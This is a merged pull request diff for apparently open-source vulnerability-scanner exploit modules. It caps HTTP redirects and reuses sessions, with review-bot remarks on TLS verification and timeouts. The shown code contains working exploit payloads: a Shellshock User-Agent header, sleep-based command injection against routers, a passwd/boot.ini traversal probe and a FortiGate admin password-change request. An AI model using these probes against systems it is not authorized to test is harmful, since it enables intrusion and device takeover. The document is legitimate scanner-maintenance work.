
Set max redirections attribute #38

Merged
merged 11 commits into from
Dec 20, 2023
10 changes: 8 additions & 2 deletions agent/exploits/cve_2014_0780.py
Expand Up @@ -18,6 +18,7 @@

DEFAULT_TIMEOUT = 90
DEPTH = 10
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -27,15 +28,20 @@ class CVE20140780Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
session.get(target_uri, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
return True

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
file_names = ["boot.ini", "etc/passwd"]
for file_name in file_names:
Expand All @@ -46,7 +52,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
r = requests.Request(method="GET", url=url)
prep = r.prepare()
prep.url = url
response = session.send(prep, verify=False, timeout=DEFAULT_TIMEOUT)
response = session.send(prep, timeout=DEFAULT_TIMEOUT)
except requests.exceptions.RequestException:
return []

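Review bot: Moving `verify=False` from the call onto the session in accept() changes behaviour when the agent runs with `REQUESTS_CA_BUNDLE` or `CURL_CA_BUNDLE` set: in requests 2.x, `Session.request()` lets those variables take precedence over `session.verify = False` when no per-call `verify` is given, so `session.get(target_uri, timeout=DEFAULT_TIMEOUT)` would verify certificates and accept() would return False for targets with self-signed certificates. Keeping the explicit argument, `session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)`, preserves the previous behaviour; the `session.send()` call in check() is not affected, because it takes `session.verify` as its default without consulting the environment. The same applies to the `session.get`/`session.post` calls in cve_2016_2386.py, cve_2018_10561.py, cve_2018_13382.py and cve_2019_12989__cve_2019_12991.py. check() continues past the last displayed line.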
12 changes: 7 additions & 5 deletions agent/exploits/cve_2014_7169.py
Expand Up @@ -25,31 +25,33 @@
PAYLOAD_TEMPLATE = "() { :;}; /bin/bash -c 'sleep %s'"
MAX_DELAY_DIFFERENCE = 5
DELAYS = [30, 40, 50, 60]
MAX_REDIRECTS = 2


@exploits_registry.register
class CVE20147169Exploit(definitions.Exploit):
"""CVE-2014-7169: GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability."""

def __init__(self) -> None:
self.session = requests.Session()

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
if target.path.endswith(".cgi") is False:
return False
target_uri = f"{target.scheme}://{target.host}:{target.port}{target.path}"
try:
resp = self.session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
return resp.status_code == 200

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}{target.path}"
for delay in DELAYS:
payload = PAYLOAD_TEMPLATE % delay
try:
resp = self.session.get(
resp = session.get(
target_uri,
headers={
"User-Agent": payload,
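Review bot: `session.max_redirects` in accept() and check() limits how many redirects are followed but not where they lead, so the `User-Agent` header carrying the `sleep` payload is re-sent to whatever host a `Location` header names, which may be outside the scan scope. For the probing request in check(), consider `allow_redirects=False`, or compare the host of `resp.url` with `target.host` before treating the measured delay as a finding. The same consideration holds for the check() methods in the other files of this pull request. The `session.get(...)` call in check() continues past the last displayed line, so its remaining arguments are not visible here.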
12 changes: 9 additions & 3 deletions agent/exploits/cve_2016_2386.py
Expand Up @@ -43,6 +43,7 @@
</soapenv:Envelope>
"""
PERMISSION_KEYWORD = "deletePermissionByIdResponse"
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -52,8 +53,11 @@ class CVE20162386Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
try:
resp = requests.get(target.origin, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target.origin, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
server = resp.headers.get("server", "Unknown")
Expand All @@ -64,13 +68,15 @@ def accept(self, target: definitions.Target) -> bool:
return LOWER_VULNERABLE_VERSION <= target_version <= UPPER_VULNERABLE_VERSION

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
try:
resp = requests.post(
resp = session.post(
urlparse.urljoin(target.origin, TARGET_ENDPOINT),
headers=HEADERS,
data=PAYLOAD,
timeout=DEFAULT_TIMEOUT,
verify=False,
)
except requests_exceptions.RequestException:
return []
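Review bot: The `requests.Session()` created in accept() and again in check() is never closed, so each call leaves its connection pool open until garbage collection; wrapping the request in `with requests.Session() as session:` releases it deterministically. The same three-line setup is repeated in every accept()/check() of the files shown on this page, and the copies already differ (some set `session.verify = False`, others pass `verify=False` per call, and one check() passes neither). A single helper that returns the configured session would keep them consistent. Both accept() and check() continue past the displayed lines.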
15 changes: 10 additions & 5 deletions agent/exploits/cve_2018_10561.py
Expand Up @@ -16,23 +16,30 @@
)

DEFAULT_TIMEOUT = 90
MAX_REDIRECTS = 2


@exploits_registry.register
class CVE201810562Exploit(definitions.Exploit):
"""CVE-2018-10562: Dasan GPON Routers Command Injection Vulnerability."""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
session.get(target_uri, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False

# TODO(alaeddine): Consider testing for '/?images/', '/GponForm/diag_Form?images/', '/diag.html?images/'.
return True

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
data = {
"XWebPageName": "diag",
Expand All @@ -44,15 +51,13 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
}

try:
requests.post(
session.post(
target_uri + "/GponForm/diag_Form?images/",
data=data,
verify=False,
timeout=DEFAULT_TIMEOUT,
)
response = requests.get(
response = session.get(
target_uri + "/diag.html?images/",
verify=False,
timeout=DEFAULT_TIMEOUT,
)
except requests_exceptions.RequestException:
15 changes: 9 additions & 6 deletions agent/exploits/cve_2018_13382.py
Expand Up @@ -18,6 +18,7 @@
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
}
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -27,16 +28,20 @@ class CVE201813382Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
try:
url = f"{target.scheme}://{target.host}:{target.port}/remote/login?lang=en"
r = requests.get(
url, headers=HEADERS, verify=False, timeout=DEFAULT_TIMEOUT
)
r = session.get(url, headers=HEADERS, timeout=DEFAULT_TIMEOUT)
except requests.exceptions.RequestException:
return False
return r.status_code == 200 and "<title>Please Login</title>" in r.text

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
url = f"{target.scheme}://{target.host}:{target.port}/remote/login?lang=en"
# we are trying to change the password for the user : admin
data = {
Expand All @@ -49,9 +54,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"credential2": "ChangePassword",
}
try:
res = requests.post(
url, headers=HEADERS, data=data, verify=False, timeout=DEFAULT_TIMEOUT
)
res = session.post(url, headers=HEADERS, data=data, timeout=DEFAULT_TIMEOUT)
except requests.exceptions.RequestException:
return []

12 changes: 7 additions & 5 deletions agent/exploits/cve_2018_14558.py
Expand Up @@ -21,28 +21,30 @@
TARGET_PATH = "/goform/setUsbUnload/.js?deviceName=A;"
MAX_DELAY_DIFFERENCE = 5
DELAYS = [30, 40, 50, 60]
MAX_REDIRECTS = 2


@exploits_registry.register
class CVE201814558Exploit(definitions.Exploit):
"""CVE-2018-14558: Tenda AC7, AC9, and AC10 Routers Command Injection Vulnerability"""

def __init__(self) -> None:
self.session = requests.Session()

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
resp = self.session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
elyousfi5 marked this conversation as resolved.
except requests_exceptions.RequestException:
return False
return resp.status_code == 200

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}"
for delay in DELAYS:
try:
resp = self.session.get(target_uri + TARGET_PATH + f"sleep {delay}")
resp = session.get(target_uri + TARGET_PATH + f"sleep {delay}")
except requests_exceptions.RequestException:
return []
elapsed = resp.elapsed.seconds
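Review bot: The probing request in check(), `session.get(target_uri + TARGET_PATH + f"sleep {delay}")`, passes neither `timeout` nor `verify=False`, unlike the `session.get` in accept(). Without a timeout, a target that never answers blocks the agent indefinitely; with certificate verification left on, an HTTPS target with a self-signed certificate that accept() let through raises an SSLError, which the `except` turns into an empty result. Passing `verify=False, timeout=DEFAULT_TIMEOUT` here would align the two calls, provided `DEFAULT_TIMEOUT` exceeds the longest value in `DELAYS`; its definition is outside the displayed lines. check() continues past the last displayed line.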
18 changes: 13 additions & 5 deletions agent/exploits/cve_2018_14667.py
Expand Up @@ -24,6 +24,7 @@
JST_PATTERN = re.compile(r"JSF/(.*)")
UPPER_VULNERABLE_VERSION = version.parse("3.3.4")
VERSION_PATTERN = re.compile(r'href="/a4j/s/(\d+_\d+_\d+)\.Final')
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -33,8 +34,10 @@ class CVE201814667Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
try:
resp = requests.get(target.origin, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target.origin, verify=False, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False

Expand All @@ -46,10 +49,15 @@ def accept(self, target: definitions.Target) -> bool:
return JST_PATTERN.search(jsf_header) is not None

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
resp = requests.get(
target.origin,
timeout=DEFAULT_TIMEOUT,
)
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
try:
resp = session.get(
target.origin,
timeout=DEFAULT_TIMEOUT,
)
except requests.exceptions.RequestException:
return []

if resp.status_code != 200:
return []
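Review bot: check() calls `session.get(target.origin, timeout=DEFAULT_TIMEOUT)` with certificate verification on, while accept() passes `verify=False`, so an HTTPS target with a self-signed certificate passes accept() and then fails in check(). With the `try`/`except` added here, that failure now returns `[]` silently, which reads as "not vulnerable" rather than "could not be tested". Passing `verify=False` in check() as accept() does, or logging the exception before `return []`, would make the two outcomes distinguishable. check() continues past the last displayed line.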
8 changes: 6 additions & 2 deletions agent/exploits/cve_2018_7841.py
Expand Up @@ -18,6 +18,7 @@
MAX_DELAY_DIFFERENCE = 5
DELAYS = [30, 40, 50, 60]
TARGET_ENDPOINT = "/smartdomuspad/modules/reporting/track_import_export.php"
MAX_REDIRECTS = 2


@exploits_registry.register
Expand All @@ -27,16 +28,19 @@ class CVE20187841Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
resp = requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
resp = session.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
return resp.status_code == 200

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
target_uri = f"{target.scheme}://{target.host}:{target.port}"
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
target_uri = f"{target.scheme}://{target.host}:{target.port}"

for delay in DELAYS:
data = f"op=export&language=english&interval=1&object_id=`sleep {delay}`"
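Review bot: check() now builds `session` and sets `session.max_redirects`, but the request that sends `data` lies past the last displayed line, so it cannot be confirmed from here that it goes through `session` rather than the module-level `requests.post`. If it still uses the module-level call, the redirect cap has no effect on the probing request and the new session is unused. Worth confirming that the call inside the `for delay in DELAYS:` loop reads `session.post(...)`.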
13 changes: 9 additions & 4 deletions agent/exploits/cve_2019_12989__cve_2019_12991.py
Expand Up @@ -16,6 +16,7 @@

DEFAULT_TIMEOUT = 90
HEADERS = {"SSL_CLIENT_VERIFY": "SUCCESS"}
MAX_REDIRECTS = 2

logger = logging.getLogger(__name__)

Expand All @@ -27,14 +28,20 @@ class CVE201912989Exploit(definitions.Exploit):
"""

def accept(self, target: definitions.Target) -> bool:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
target_uri = f"{target.scheme}://{target.host}:{target.port}"
try:
requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
session.get(target_uri, timeout=DEFAULT_TIMEOUT)
except requests_exceptions.RequestException:
return False
return True

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
session = requests.Session()
session.max_redirects = MAX_REDIRECTS
session.verify = False
url = (
f"{target.scheme}://{target.host}:{target.port}"
f"/sdwan/nitro/v1/config/get_package_file?action=file_download"
Expand All @@ -52,9 +59,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
}
}
try:
r = requests.post(
url, headers=HEADERS, json=json, verify=False, timeout=DEFAULT_TIMEOUT
)
r = session.post(url, headers=HEADERS, json=json, timeout=DEFAULT_TIMEOUT)
except requests.exceptions.RequestException as e:
logger.error("Error : %s", e)
return []